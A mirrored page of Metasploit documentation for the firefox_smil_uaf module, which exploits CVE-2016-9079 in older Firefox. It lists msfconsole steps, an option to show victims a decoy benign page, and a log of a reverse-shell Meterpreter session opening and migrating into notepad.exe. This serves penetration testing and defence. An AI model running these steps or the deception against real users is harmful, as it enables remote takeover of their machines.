CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/browser/firefox_smil_uaf.md
Views: 11788

Mozilla Firefox is a free, open-source web browser developed and maintained by the Mozilla Foundation. Multiple versions are affected by a use-after-free vulnerability, detailed by CVE 2016-9079, that can result in arbitrary remote code execution.

Vulnerable Application

The vulnerability is present in all releases of Mozilla Firefox prior to 50.0.2

Firefox 38 through 41 were specifically chosen as targets for this module, though support for more releases is planned.

Usage

UsePostHTML module option

The module includes an option named UsePostHTML which is turned off by default. Setting this option to true will result in the module sending an HTML page to the target to be rendered after successful exploitation. This can be useful in convincing the target that they have arrived at a legitimate, benign website. If desired, please edit $datadirectory/exploits/firefox_smil_uaf/post.html to suit your needs. The included example file more than likely won't be suitable for your purposes.

Using firefox_smil_uaf

  1. Start msfconsole

  2. Do: use exploit/windows/browser/firefox_smil_uaf

  3. Do: set payload [PREFERRED PAYLOAD]

  4. Do: set PAYLOAD [PAYLOAD NAME]

  5. Set payload options as needed

  6. Do: run, and have a target browse to the generated URL

  7. Once a vulnerable target connects, you should receive a session like this:

[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.79.132:6789 
[*] Using URL: http://192.168.79.132:4567/lol
[*] Server started.
msf exploit(firefox_smil_uaf) > [*] 192.168.79.184   firefox_smil_uaf - Got request: /lol/
[*] 192.168.79.184   firefox_smil_uaf - From: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
[*] 192.168.79.184   firefox_smil_uaf - Sending exploit HTML ...
[*] 192.168.79.184   firefox_smil_uaf - Got request: /lol/worker.js
[*] 192.168.79.184   firefox_smil_uaf - From: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
[*] 192.168.79.184   firefox_smil_uaf - Sending worker thread Javascript ...
[*] Sending stage (957487 bytes) to 192.168.79.184
[*] Meterpreter session 1 opened (192.168.79.132:6789 -> 192.168.79.184:52341) at 2017-01-20 11:25:38 -0600
[*] Session ID 1 (192.168.79.132:6789 -> 192.168.79.184:52341) processing InitialAutoRunScript 'migrate -f'
[*] Running module against WIN-UTRINKNPT3D
[*] Current server process: firefox.exe (1448)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2572
[+] Successfully migrated to process 2572